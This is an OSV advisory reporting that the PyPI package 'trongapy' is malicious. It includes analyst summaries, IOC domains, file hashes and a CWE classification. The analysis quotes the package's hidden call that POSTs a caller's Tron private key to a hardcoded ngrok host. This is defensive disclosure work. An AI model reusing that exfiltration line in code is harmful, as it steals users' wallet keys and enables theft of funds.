MAL-2026-5683

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/trongapy/MAL-2026-5683.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5683
Published
2026-06-12T07:33:10Z
Modified
2026-06-12T20:02:02.305304479Z
Summary
Malicious code in trongapy (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (0fa840452c4774ec07d74bbed23fbe1c848a2d83303df3f028e73af31045b495)

The package's only public function, perm(private_key) in trongapy/main.py, unconditionally POSTs the caller-supplied Tron private key as JSON to a hardcoded ngrok tunnel: requests.post('https://reda-sequestered-justine.ngrok-free.dev/tron', json={'private_key': private_key}). The package name 'trongapy' suggests a Tron blockchain helper; any developer who invokes the advertised API with a real private key silently transmits that key to the author, who can then drain the associated wallets. No disclosure of this transmission appears in package documentation. Package metadata further undermines provenance: setup.py lists author 'mirontrx' (dueltmp+wajte@gmail.com) while the 'Source Repository' URL points to an unrelated GitHub user with a literal 'replace with your github source' placeholder comment.

Source: kam193 (aacf2f97461deed6a022e67932b5b4af6e99163664e4de6b0a16256fd68a3cd4)

Package appears to be designed for private key exfiltration, but no known usage. The name appears to be related to the cryptocurrency TRX (Tron / Tronix). Some packages additionally clone the readme of other, legit libraries. The similar packages are repeating uploaded to PyPI


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2025-04-tronix

Reasons (based on the campaign):

  • exfiltration-generic

  • crypto-related

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "0.0.1"
            ],
            "sha256": "aacf2f97461deed6a022e67932b5b4af6e99163664e4de6b0a16256fd68a3cd4",
            "modified_time": "2026-06-12T07:33:11.043504Z",
            "source": "kam193",
            "import_time": "2026-06-12T08:51:24.493955888Z",
            "id": "pypi/2025-04-tronix/trongapy"
        },
        {
            "versions": [
                "0.0.1"
            ],
            "sha256": "0fa840452c4774ec07d74bbed23fbe1c848a2d83303df3f028e73af31045b495",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:09:31Z",
            "import_time": "2026-06-12T19:44:10.864280112Z",
            "id": "IN-MAL-2026-006125"
        }
    ],
    "iocs": {
        "domains": [
            "68076f26e81df7060eba3e58.mockapi.io",
            "66c0dc0bba6f27ca9a57c4bf.mockapi.io",
            "67b9f37c51192bd378dee810.mockapi.io",
            "reda-sequestered-justine.ngrok-free.dev"
        ]
    }
}
References
Credits

Affected packages

PyPI / trongapy

Package

Affected ranges

Affected versions

0.*
0.0.1

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "trongapy-0.0.1-py3-none-any.whl",
            "hashes": {
                "sha256": "dc79a04bd0a61df43cc77658f7a2d5edd5925f7963397bff52791181456f62f9",
                "md5": "5c8cb50dbe5c6c79b3ea814d45eed62e",
                "blake2b_256": "94e009dd435ac4b0d56c40c8eb2a6cdebb6c69e8923ee1baf5d4f16a30e43a55"
            }
        },
        {
            "filename": "trongapy-0.0.1.tar.gz",
            "hashes": {
                "sha256": "0f145279c0ccd64adbfe93ee92561b75597f101cd1292fe838ddc51019ed1c1d",
                "md5": "d2100b1cf197532a8ad875618a56ea05",
                "blake2b_256": "f7396ed95ffd1df5ffba65c4ec0cbc42c28807c246ac311db96ca1b71afc0c92"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "3e075389e4101fc247bc5fb09a8bc0e223664568746f73792b54b27b486b2d6b",
            "path": "trongapy/main.py",
            "tlsh": "eb317a5206da280e8201b42bdc497e0d3cd768ff3e9f263836dc489a7fe613445a5192"
        },
        {
            "sha256": "2aab65b0cbefe4ddc475b1eb522a70db6e7a7a7c3f9cc002a4b32d1851ad107e",
            "path": "setup.py",
            "tlsh": "d711cca64c51211514b9825cac269c9ff636636b695088d7fd7c02443ff22c3eeb7628"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/trongapy/MAL-2026-5683.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]